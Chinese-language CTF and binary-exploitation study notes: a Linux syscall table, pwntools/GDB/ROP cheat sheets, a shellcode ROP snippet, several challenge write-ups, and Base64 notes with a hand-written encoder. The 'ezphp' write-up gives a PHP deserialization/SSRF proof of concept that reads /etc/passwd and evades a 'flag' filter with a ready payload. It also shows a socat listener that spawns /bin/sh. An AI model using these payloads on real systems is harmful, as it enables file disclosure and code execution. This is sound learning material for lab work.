209 getresuid32 0xd1 uid_t *ruidp uid_t *euidp uid_t *suidp - - - kernel/sys.c:873
210 setresgid32 0xd2 gid_t rgid gid_t egid gid_t sgid - - - kernel/sys.c:893
211 getresgid32 0xd3 gid_t *rgidp gid_t *egidp gid_t *sgidp - - - kernel/sys.c:945
212 chown32 0xd4 const char *filename uid_t user gid_t group - - - fs/open.c:540
213 setuid32 0xd5 uid_t uid - - - - - kernel/sys.c:761
214 setgid32 0xd6 gid_t gid - - - - - kernel/sys.c:614
215 setfsuid32 0xd7 uid_t uid - - - - - kernel/sys.c:969
216 setfsgid32 0xd8 gid_t gid - - - - - kernel/sys.c:1008
217 pivot_root 0xd9 const char *new_root const char *put_old - - - - fs/namespace.c:2453
218 mincore 0xda unsigned long start size_t len unsigned char *vec - - - mm/mincore.c:266
219 madvise 0xdb unsigned long start size_t len_in int behavior - - - mm/madvise.c:362
220 getdents64 0xdc unsigned int fd struct linux_dirent64 *dirent unsigned int count - - - fs/readdir.c:272
221 fcntl64 0xdd unsigned int fd unsigned int cmd unsigned long arg - - - fs/fcntl.c:468
224 gettid 0xe0 - - - - - - kernel/timer.c:1569
225 readahead 0xe1 loff_t offset size_t count - - - - - mm/readahead.c:579
226 setxattr 0xe2 const char *pathname const char *name const void *value size_t size int flags - fs/xattr.c:361
227 lsetxattr 0xe3 const char *pathname const char *name const void *value size_t size int flags - fs/xattr.c:380
228 fsetxattr 0xe4 int fd const char *name const void *value size_t size int flags - fs/xattr.c:399
229 getxattr 0xe5 const char *pathname const char *name void *value size_t size - - fs/xattr.c:459
230 lgetxattr 0xe6 const char *pathname const char *name void *value size_t size - - fs/xattr.c:473
231 fgetxattr 0xe7 int fd const char *name void *value size_t size - - fs/xattr.c:487
232 listxattr 0xe8 const char *pathname char *list size_t size - - - fs/xattr.c:541
233 llistxattr 0xe9 const char *pathname char *list size_t size - - - fs/xattr.c:555
234 flistxattr 0xea int fd char *list size_t size - - - fs/xattr.c:569
235 removexattr 0xeb const char *pathname const char *name - - - - fs/xattr.c:602
236 lremovexattr 0xec const char *pathname const char *name - - - - fs/xattr.c:620
237 fremovexattr 0xed int fd const char *name - - - - fs/xattr.c:638
238 tkill 0xee pid_t pid int sig - - - - kernel/signal.c:2923
239 sendfile64 0xef int out_fd int in_fd loff_t *offset size_t count - - fs/read_write.c:992
240 futex 0xf0 u32 *uaddr int op u32 val struct timespec *utime u32 *uaddr2 u32 val3 kernel/futex.c:2680
241 sched_setaffinity 0xf1 pid_t pid unsigned int len unsigned long *user_mask_ptr - - - kernel/sched/core.c:4626
242 sched_getaffinity 0xf2 pid_t pid unsigned int len unsigned long *user_mask_ptr - - - kernel/sched/core.c:4677
243 set_thread_area 0xf3 struct user_desc *u_info - - - - - arch/x86/kernel/tls.c:92
244 get_thread_area 0xf4 struct user_desc *u_info - - - - - arch/x86/kernel/tls.c:142
245 io_setup 0xf5 unsigned nr_events aio_context_t *ctxp - - - - fs/aio.c:1298
246 io_destroy 0xf6 aio_context_t ctx - - - - - fs/aio.c:1334
247 io_getevents 0xf7 aio_context_t ctx_id long min_nr long nr struct io_event *events struct timespec *timeout - fs/aio.c:1844
248 io_submit 0xf8 aio_context_t ctx_id long nr struct iocb * *iocbpp - - - fs/aio.c:1746
249 io_cancel 0xf9 aio_context_t ctx_id struct iocb *iocb struct io_event *result - - - fs/aio.c:1781
250 fadvise64 0xfa loff_t offset size_t len int advice - - - - mm/fadvise.c:148
252 exit_group 0xfc int error_code - - - - - kernel/exit.c:1136
253 lookup_dcookie 0xfd char *buf size_t len - - - - - fs/dcookies.c:148
254 epoll_create 0xfe int size - - - - - fs/eventpoll.c:1668
255 epoll_ctl 0xff int epfd int op int fd struct epoll_event *event - - fs/eventpoll.c:1681
256 epoll_wait 0x100 int epfd struct epoll_event *events int maxevents int timeout - - fs/eventpoll.c:1809
257 remap_file_pages 0x101 unsigned long start unsigned long size unsigned long prot unsigned long pgoff unsigned long flags - mm/fremap.c:122
258 set_tid_address 0x102 int *tidptr - - - - - kernel/fork.c:1109
259 timer_create 0x103 const clockid_t which_clock struct sigevent *timer_event_spec timer_t *created_timer_id - - - kernel/posix-timers.c:535
260 timer_settime 0x104 timer_t timer_id int flags const struct itimerspec *new_setting struct itimerspec *old_setting - - kernel/posix-timers.c:819
261 timer_gettime 0x105 timer_t timer_id struct itimerspec *setting - - - - kernel/posix-timers.c:715
262 timer_getoverrun 0x106 timer_t timer_id - - - - - kernel/posix-timers.c:751
263 timer_delete 0x107 timer_t timer_id - - - - - kernel/posix-timers.c:882
264 clock_settime 0x108 const clockid_t which_clock const struct timespec *tp - - - - kernel/posix-timers.c:950
265 clock_gettime 0x109 const clockid_t which_clock struct timespec *tp - - - - kernel/posix-timers.c:965
266 clock_getres 0x10a const clockid_t which_clock struct timespec *tp - - - - kernel/posix-timers.c:1006
267 clock_nanosleep 0x10b const clockid_t which_clock int flags const struct timespec *rqtp struct timespec *rmtp - - kernel/posix-timers.c:1035
268 statfs64 0x10c const char *pathname size_t sz struct statfs64 *buf - - - fs/statfs.c:175
269 fstatfs64 0x10d unsigned int fd size_t sz struct statfs64 *buf - - - fs/statfs.c:196
270 tgkill 0x10e pid_t tgid pid_t pid int sig - - - kernel/signal.c:2907
271 utimes 0x10f char *filename struct timeval *utimes - - - - fs/utimes.c:221
272 fadvise64_64 0x110 loff_t offset loff_t len int advice - - - - mm/fadvise.c:27
273 vserver - - - - - - - Not implemented
274 mbind 0x112 unsigned long start unsigned long len unsigned long mode unsigned long *nmask unsigned long maxnode unsigned flags mm/mempolicy.c:1263
275 get_mempolicy 0x113 int *policy unsigned long *nmask unsigned long maxnode unsigned long addr unsigned long flags - mm/mempolicy.c:1400
276 set_mempolicy 0x114 int mode unsigned long *nmask unsigned long maxnode - - - mm/mempolicy.c:1285
277 mq_open 0x115 const char *u_name int oflag umode_t mode struct mq_attr *u_attr - - ipc/mqueue.c:803
278 mq_unlink 0x116 const char *u_name - - - - - ipc/mqueue.c:876
279 mq_timedsend 0x117 mqd_t mqdes const char *u_msg_ptr size_t msg_len unsigned int msg_prio const struct timespec *u_abs_timeout - ipc/mqueue.c:971
280 mq_timedreceive 0x118 mqd_t mqdes char *u_msg_ptr size_t msg_len unsigned int *u_msg_prio const struct timespec *u_abs_timeout - ipc/mqueue.c:1092
281 mq_notify 0x119 mqd_t mqdes const struct sigevent *u_notification - - - - ipc/mqueue.c:1201
282 mq_getsetattr 0x11a mqd_t mqdes const struct mq_attr *u_mqstat struct mq_attr *u_omqstat - - - ipc/mqueue.c:1333
283 kexec_load 0x11b unsigned long entry unsigned long nr_segments struct kexec_segment *segments unsigned long flags - - kernel/kexec.c:940
284 waitid 0x11c int which pid_t upid struct siginfo *infop int options struct rusage *ru - kernel/exit.c:1763
286 add_key 0x11e const char *_type const char *_description const void *_payload size_t plen key_serial_t ringid - security/keys/keyctl.c:54
287 request_key 0x11f const char *_type const char *_description const char *_callout_info key_serial_t destringid - - security/keys/keyctl.c:147
288 keyctl 0x120 int option unsigned long arg2 unsigned long arg3 unsigned long arg4 unsigned long arg5 - security/keys/keyctl.c:1556
289 ioprio_set 0x121 int which int who int ioprio - - - fs/ioprio.c:61
290 ioprio_get 0x122 int which int who - - - - fs/ioprio.c:176
291 inotify_init 0x123 - - - - - - fs/notify/inotify/inotify_user.c:749
292 inotify_add_watch 0x124 int fd const char *pathname u32 mask - - - fs/notify/inotify/inotify_user.c:754
293 inotify_rm_watch 0x125 int fd __s32 wd - - - - fs/notify/inotify/inotify_user.c:795
294 migrate_pages 0x126 pid_t pid unsigned long maxnode const unsigned long *old_nodes const unsigned long *new_nodes - - mm/mempolicy.c:1304
295 openat 0x127 int dfd const char *filename int flags umode_t mode - - fs/open.c:1059
296 mkdirat 0x128 int dfd const char *pathname umode_t mode - - - fs/namei.c:2723
297 mknodat 0x129 int dfd const char *filename umode_t mode unsigned dev - - fs/namei.c:2646
298 fchownat 0x12a int dfd const char *filename uid_t user gid_t group int flag - fs/open.c:559
299 futimesat 0x12b int dfd const char *filename struct timeval *utimes - - - fs/utimes.c:193
300 fstatat64 0x12c int dfd const char *filename struct stat64 *statbuf int flag - - fs/stat.c:407
301 unlinkat 0x12d int dfd const char *pathname int flag - - - fs/namei.c:2968
302 renameat 0x12e int olddfd const char *oldname int newdfd const char *newname - - fs/namei.c:3309
303 linkat 0x12f int olddfd const char *oldname int newdfd const char *newname int flags - fs/namei.c:3097
304 symlinkat 0x130 const char *oldname int newdfd const char *newname - - - fs/namei.c:3004
305 readlinkat 0x131 int dfd const char *pathname char *buf int bufsiz - - fs/stat.c:293
306 fchmodat 0x132 int dfd const char *filename umode_t mode - - - fs/open.c:486
307 faccessat 0x133 int dfd const char *filename int mode - - - fs/open.c:299
308 pselect6 0x134 int n fd_set *inp fd_set *outp fd_set *exp struct timespec *tsp void *sig fs/select.c:671
309 ppoll 0x135 struct pollfd *ufds unsigned int nfds struct timespec *tsp const sigset_t *sigmask size_t sigsetsize - fs/select.c:942
310 unshare 0x136 unsigned long unshare_flags - - - - - kernel/fork.c:1778
311 set_robust_list 0x137 struct robust_list_head *head size_t len - - - - kernel/futex.c:2422
312 get_robust_list 0x138 int pid struct robust_list_head * *head_ptr size_t *len_ptr - - - kernel/futex.c:2444
313 splice 0x139 int fd_in loff_t *off_in int fd_out loff_t *off_out size_t len unsigned int flags fs/splice.c:1689
314 sync_file_range 0x13a loff_t offset loff_t nbytes unsigned int flags - - - - fs/sync.c:275
315 tee 0x13b int fdin int fdout size_t len unsigned int flags - - fs/splice.c:2025
316 vmsplice 0x13c int fd const struct iovec *iov unsigned long nr_segs unsigned int flags - - fs/splice.c:1663
317 move_pages 0x13d pid_t pid unsigned long nr_pages const void * *pages const int *nodes int *status int flags mm/migrate.c:1343
318 getcpu 0x13e unsigned *cpup unsigned *nodep struct getcpu_cache *unused - - - kernel/sys.c:2179
319 epoll_pwait 0x13f int epfd struct epoll_event *events int maxevents int timeout const sigset_t *sigmask size_t sigsetsize fs/eventpoll.c:1860
320 utimensat 0x140 int dfd const char *filename struct timespec *utimes int flags - - fs/utimes.c:175
321 signalfd 0x141 int ufd sigset_t *user_mask size_t sizemask - - - fs/signalfd.c:292
322 timerfd_create 0x142 int clockid int flags - - - - fs/timerfd.c:252
323 eventfd 0x143 unsigned int count - - - - - fs/eventfd.c:431
324 fallocate 0x144 int mode loff_t offset loff_t len - - - - fs/open.c:272
325 timerfd_settime 0x145 int ufd int flags const struct itimerspec *utmr struct itimerspec *otmr - - fs/timerfd.c:283
326 timerfd_gettime 0x146 int ufd struct itimerspec *otmr - - - - fs/timerfd.c:344
327 signalfd4 0x147 int ufd sigset_t *user_mask size_t sizemask int flags - - fs/signalfd.c:237
328 eventfd2 0x148 unsigned int count int flags - - - - fs/eventfd.c:406
329 epoll_create1 0x149 int flags - - - - - fs/eventpoll.c:1625
330 dup3 0x14a unsigned int oldfd unsigned int newfd int flags - - - fs/fcntl.c:53
331 pipe2 0x14b int *fildes int flags - - - - fs/pipe.c:1133
332 inotify_init1 0x14c int flags - - - - - fs/notify/inotify/inotify_user.c:724
333 preadv 0x14d unsigned long fd const struct iovec *vec unsigned long vlen unsigned long pos_l unsigned long pos_h - fs/read_write.c:835
334 pwritev 0x14e unsigned long fd const struct iovec *vec unsigned long vlen unsigned long pos_l unsigned long pos_h - fs/read_write.c:860
335 rt_tgsigqueueinfo 0x14f pid_t tgid pid_t pid int sig siginfo_t *uinfo - - kernel/signal.c:2979
336 perf_event_open 0x150 struct perf_event_attr *attr_uptr pid_t pid int cpu int group_fd unsigned long flags - kernel/events/core.c:6186
337 recvmmsg 0x151 int fd struct mmsghdr *mmsg unsigned int vlen unsigned int flags struct timespec *timeout - net/socket.c:2313
338 fanotify_init 0x152 unsigned int flags unsigned int event_f_flags - - - - fs/notify/fanotify/fanotify_user.c:679
339 fanotify_mark 0x153 unsigned int flags __u64 mask int dfd const char *pathname - - - - fs/notify/fanotify/fanotify_user.c:767
340 prlimit64 0x154 pid_t pid unsigned int resource const struct rlimit64 *new_rlim struct rlimit64 *old_rlim - - kernel/sys.c:1599
341 name_to_handle_at 0x155 int dfd const char *name struct file_handle *handle int *mnt_id int flag - fs/fhandle.c:92
342 open_by_handle_at 0x156 int mountdirfd struct file_handle *handle int flags - - - fs/fhandle.c:257
343 clock_adjtime 0x157 const clockid_t which_clock struct timex *utx - - - - kernel/posix-timers.c:983
344 syncfs 0x158 int fd - - - - - fs/sync.c:134
345 sendmmsg 0x159 int fd struct mmsghdr *mmsg unsigned int vlen unsigned int flags - - net/socket.c:2091
346 setns 0x15a int fd int nstype - - - - kernel/nsproxy.c:235
347 process_vm_readv 0x15b pid_t pid const struct iovec *lvec unsigned long liovcnt const struct iovec *rvec unsigned long riovcnt unsigned long flags mm/process_vm_access.c:398
348 process_vm_writev 0x15c pid_t pid const struct iovec *lvec unsigned long liovcnt const struct iovec *rvec unsigned long riovcnt unsigned long flags mm/process_vm_access.c:405
349 kcmp 0x15d pid_t pid1 pid_t pid2 int type unsigned long idx1 unsigned long idx2 - kernel/kcmp.c:95

pwntools

process & remote

1
2
3
p = process(binary.path)

r=remote('google.com', 80)

context

1
2
3
4

exe = context.binary = ELF('./challenge-binary') #方便与asm()函数连用,找shellcode

context.log_level='debug' #所有交互的数据以十六进制显示

send、sendline、recv、recvutil、recvrepeate、recvline

1
2
3
4
5
6
7
8
9
10
11
p.send()

p.sendline('111') #发送数据,并在最后加上\n

p.recv(numb=4096, timeout=default)

recvrepeat(timeout=default) #接收到EOF或timeout

p.recvutil('abc') #直到接收到abc

p.recvline() #接收数据到换行

ELF

方便查看信息,如got、plt表等

1
2
3
4
5
6
7
8
9
>>> e = ELF('/bin/cat')
>>> print hex(e.address)
0x400000
>>> print hex(e.symbols['write'])
0x401680
>>> print hex(e.got['write'])
0x60b070
>>> print hex(e.plt['write'])
0x401680

cyclic

1
2
3
cyclic n    #生成n个字符,默认32位(-c参数改动),所以任意四个连续字符是独一无二的

cyclinc -l 0x61616166 #查找偏移

attach

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Attach directly to pid 1234
gdb.attach(1234)


# Attach to the youngest "bash" process
gdb.attach('bash')


# Start a process
bash = process('bash')

# Attach the debugger
gdb.attach(bash, '''
set follow-fork-mode child
break execve
continue
''')

# Interact with the process
bash.sendline('whoami')


# Start a forking server
server = process(['socat', 'tcp-listen:1234,fork,reuseaddr', 'exec:/bin/sh'])

# Connect to the server
io = remote('localhost', 1234)

# Connect the debugger to the server-spawned process
gdb.attach(io, '''
break exit
continue
''')

# Talk to the spawned 'sh'
io.sendline('exit')


# Connect to the SSH server
shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)

# Start a process on the server
cat = shell.process(['cat'])

# Attach a debugger to it
gdb.attach(cat, '''
break exit
continue
''')

# Cause `cat` to exit
cat.close()

pwn template

生成exp的模板

参考链接

GDB

通用

x

1
x/20wx 0x4005fe

查看address的内容,20为个数(数字可省略),w为四字节,可改为b/h/g(1/2/8字节),第二个x代表十六进制,可改为u/d/s/i(unsigned int/10进制/字符串/指令),空格后门是地址

set

1
set *address = value #将address的值设置成value,一次设置4 byte

*可以替换成{char/short/long},分别设定1/2/8 byte;也可以给寄存器设值

e.g.

1
set {int}0x0804a060 = 1337

peda

  • elfsymbol
    • 查看function .plt表
    • ROP需要
  • vvmap
    • 查看process mapping
    • 虚拟内存的权限,r=读,w=写,x=执行,s=共享,p=私有
  • readelf
    • 查看session位置
    • ret2dl_resolve需要
  • find
    • search memory里的pattern
      • 通常用来找字符串 e.g. find /bin/sh
  • record

ROP

rp++

ROPgadget

–ropchain 仅适用于静态链接

pwntools rop模块

代码片段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
import time

bss_addr =
proc= './binary'
context.binary = proc
shellcode = asm(shellcraft.sh())

p = process(proc)

p.recvuntil('')

rop = ROP(proc)
rop.read(0,bss_addr+0x100,len(shellcode))
rop.call(bss_addr + 0x100)

p.sed('a'*20 + str(rop))
time.sleep(1)
p.send(shellcode)

p.interactive()

tips

  • read、write函数的文件描述符:标准输入(standard input)是 0,标准输出(standard output)是 1,标准错误(standard error)是 2

查看libc版本

远程

  • libcdb.com

  • Libc-database(github上的一个项目,没有前面网址全)

本地

  • ldd binary 可以看到binary使用的libc库文件

objdump

1
objdump -R binary

查看binary符号表的信息

Segment

在程序执行时才有的概念,基本会根据读写执行权限及特性分为数个segmnet,e.g. rodata、data、code、stack、heap等

  • data:rw-
  • code:r-x
  • stack:rw-
  • heap:rw-

x86 assembly

lea & mov

e.g.

1
2
3
4
5
6
7
8
lea/mov eax,[eax + 4]

eax = 3
esp + 4 = 0xbfff7488
[esp + 4] = 0xdeadbeef

lea: eax = 0xbfff7488
mov: eax = 0xdeadbeef

leave

mv ebp,esp
pop ebp

syscalls

int 0x80 即中断处理函数,用于处理 system_call

  • 操作系统实现系统调用的基本过程是
    1. 应用程序调用库函数(API)
    2. API将系统调用号存入EAX,然后通过中断调用使系统进入内核态
    3. 内核中的中断处理函数根据系统调用号,调用对应的内核函数(系统调用)
    4. 系统调用完成相应功能,将返回值存入EAX,返回到中断处理函数
    5. 中断处理函数返回到API中
    6. API将EAX返回给应用程序

common_encrypt

加密算法如下

1
2
3
4
5
6
7
8
9
10
11
def encrypt(data,groupnums):
a=[]
b=[]
section=int(len(data)/groupnums)
for i in range(0,len(data),section):
a.append(data[i:i+section])
for i in range(section):
for j in range(groupnums):
b.append(a[j][i])
cipher=(''.join(chr(ord(b[i])^i) for i in range(len(b))))
return cipher

把groupnums设为1,再加密一次,得到字符串
f_l1angt{3crr3ysptt10n_g1!s}
因为有花括号,怀疑这是栅栏密码,肉眼观察发现k是2
手输flag提交

onion_secret

把jpg后缀改为zip
发现hint的问号用0-10某个数字后是解压密码
解压一层还有一层,于是写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import os, sys, zipfile


j = 0
while True:
original_file = str(j) + "onion.zip"
original_file = zipfile.ZipFile(original_file, 'r')
with open(str(j) + 'hint.txt', 'r') as f:
password = f.read()
password = password.split(" ")[2:][0]
position = password.find('?')
for i in range(10):
password = password[:position] + str(i) + password[position + 1:]
print(password)
original_file.setpassword(password.encode())
# original_file = zipfile.ZipFile(original_file)
try:
data = original_file.read("onion.zip")
with open(str(j + 1) + "onion.zip", 'wb') as f1:
f1.write(data)

hint = original_file.read("hint.txt")
with open(str(j + 1) + "hint.txt", 'wb') as f2:
f2.write(hint)
print("hint")
j = j + 1
break
except:
pass

解包到剩下最后一层,手动爆破,获得flag

strange_ssid

strings ctf.pcap | awk ‘{print $1}’| grep -E ‘^[A-Za-z0-9]+$’
得到一串正常字符串
提交字符串报错
添加flag{}标记提交,成功

ezphp

过程分析

打开拿到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php

class Hello {
protected $a;

function test() {
$b = strpos($this->a, 'flag');
if($b) {
die("Bye!");
}
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $this->a);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
echo curl_exec($c);
}

function __destruct(){
$this->test();
}
}

if (isset($_GET["z"])) {
unserialize($_GET["z"]);
} else {
highlight_file(__FILE__);
}

发现是ssrf+反序列化
其中反序列化比较简单,肯定会触发destruct
构造如下poc读取/etc/passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php

class Hello {
protected $a='file:///etc/passwd';

function test() {
$b = strpos($this->a, 'flag');
if($b) {
die("Bye!");
}
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $this->a);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
echo curl_exec($c);
}

function __destruct(){
$this->test();
}
}

// if (isset($_GET["z"])) {
// unserialize($_GET["z"]);
// } else {
// highlight_file(__FILE__);
// }
$x = new Hello();
echo urlencode(serialize($x));

成功读取/etc/passwd

bypass

想要读取flag,发现有一个过滤,即读取文件必须是flagxxx(以flag开头)
虽然可以使用file协议,但是不能直接读取file:///flag
这里使用url编码绕过
将flag进行编码为%2566lag即可绕过检测

payload

?z=O%3A5%3A%22Hello%22%3A1%3A%7Bs%3A4%3A%22%00%2A%00a%22%3Bs%3A14%3A%22file%3A%2F%2F%2F%2566lag%22%3B%7D

  1. git
  2. 解压后打开虚拟机,用户名hancool,密码qwe123
  3. cd elasticsearch-2.3.4/bin && ./elasticsearch -d
  4. cd ~ && cd wooyun_public/flask && ./app.py
  5. 如果浏览器连接不上,把Ubuntu的防火墙关上就好(ufw disable)

Base64

定义

Base64 是一种基于64个可打印字符来表示二进制数据的表示方法。由于2^6=64,所以每6个比特为一个单元,对应某个可打印字符。3个字节有24个比特,对应于4个Base64单元,即3个字节可由4个可打印字符来表示。它可用来作为电子邮件的传输编码。在Base64中的可打印字符包括字母A-Z、a-z、数字0-9,这样共有62个字符,此外两个可打印符号在不同的系统中而不同。一些如uuencode的其他编码方法,和之后BinHex的版本使用不同的64字符集来代表6个二进制数字,但是不被称为Base64。

Base64常用于在通常处理文本数据的场合,表示、传输、存储一些二进制数据,包括MIME的电子邮件及XML的一些复杂数据。

在MIME格式的电子邮件中,Base64可以用来将binary的字节序列数据编码成ASCII字符序列构成的文本。使用时,在传输编码方式中指定Base64。使用的字符包括大小写拉丁字母各26个、数字10个、加号+和斜杠/,共64个字符,等号=用来作为后缀用途。

编码规则

  1. 将每三个字节作为一组,一共是24个二进制位
  2. 将这24个二进制位分为四组,每个组有6个二进制位
  3. 在每组前面加两个00,扩展成32个二进制位,即四个字节
  4. 根据对照表,得到扩展后的每个字节的对应符号,这就是Base64的编码值
  5. 如果要编码的字节数不能被3整除,最后会多出1个或2个字节,那么可以使用下面的方法进行处理:先使用0字节值在末尾补足,使其能够被3整除,然后再进行Base64的编码。在编码后的Base64文本后加上一个或两个=号,代表补足的字节数。也就是说,当最后剩余两个八位字节(2个byte)时,最后一个6位的Base64字节块有四位是0值,最后附加上两个等号;如果最后剩余一个八位字节(1个byte)时,最后一个6位的base字节块有两位是0值,最后附加一个等号。

base64编码是用64(2的6次方)个ASCII字符来表示256(2的8次方)个ASCII字符,也就是三位二进制数组经过编码后变为四位的ASCII字符显示,长度比原来增加1/3。

Base32

编码规则

Base32这种数据编码机制,主要用来把二进制数据编码成可见的字符串,其编码规则是:任意给定一个二进制数据,以5个位(bit)为一组进行切分(base64以6个位(bit)为一组),对切分而成的每个组进行编码得到1个可见字符。Base32编码表字符集中的字符总数为2^5=32个,这也是Base32名字的由来。A-Z、2-7

base32就是用32(2的5次方)个特定ASCII码来表示256个ASCII码。所以,5个 ASCII 字符经过base32编码后会变为8个字符(公约数为40),长度增加3/5.不足8n用“=”补足。

#Base16

base16就是用16(2的4次方)个特定ASCII码表示256个ASCII字符。1个ASCII字符经过base16编码后会变为2个字符,长度增加一倍。不足2n用“=”补足。 0-9、 A-F。

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113

def myBase64Encode(preCoding) :
charTable = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' #字符表



if len(preCoding) < 0 :

return '' #字符串为空则返回空

lackCharNums = 3-len(preCoding)%3

if lackCharNums == 3 : lackCharNums = 0 #整除说明不缺字符

#待转换字符不是3的倍数的情况补全它

for i in range(lackCharNums) :

preCoding = preCoding + b'\x00'

result = '' #用于保存最终结果的str数据

rp = '' #处理补全字符时的暂存变量

#每三个字符处理一轮

for i in range(int(len(preCoding)/3)) :

threeChar = preCoding[i*3:i*3+3] #取三个字符出来

tCode = '' #用于存放三个字符拼接后的二进制数值 文本形式

pCode = '' #暂存变量

for j in range(3) :

pCode = bin(threeChar[j])[2:] #把省略的0补上

lackZeroNums = 8-len(pCode) #省略的0的个数

for x in range(lackZeroNums) :

pCode = '0'+pCode

tCode = tCode + pCode

pCode = ''

for j in range(4) : #每6位一个字符

pCode = tCode[j*6:j*6+6]

rp = rp + charTable[int(pCode,2)]

#处理补全的00字符

result = rp[:len(rp)-lackCharNums]

for j in range(lackCharNums) :

result = result + '='

return bytes(result,encoding="utf-8")



def myBase64Decode(encodedBin) :

charTable = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' #字符表



#如果字符不是4的倍数 返回空

if not len(encodedBin)%4 == 0 :

return ''



tCode = '' #用于存放最终的二进制文本字符串

pCpde = '' #暂存变量

#遍历encodedBin每一个字符

for i in encodedBin :

for j in range(len(charTable)) : #找到表中对应坐标

if chr(i) == charTable[j] :

pCode = bin(j)[2:] #转二进制去除开头的0b

lackZeroNums = 6-len(pCode) #省略的0的个数

for x in range(lackZeroNums) :

pCode = '0'+pCode

tCode = tCode + pCode

pCode = ''

result = '' #储存最终结果

for i in range(int(len(tCode)/8)) :

pCode = tCode[i*8:i*8+8]

result = result + chr(int(pCode,2))

return bytes(result,encoding="utf-8")

by i春秋学院的博客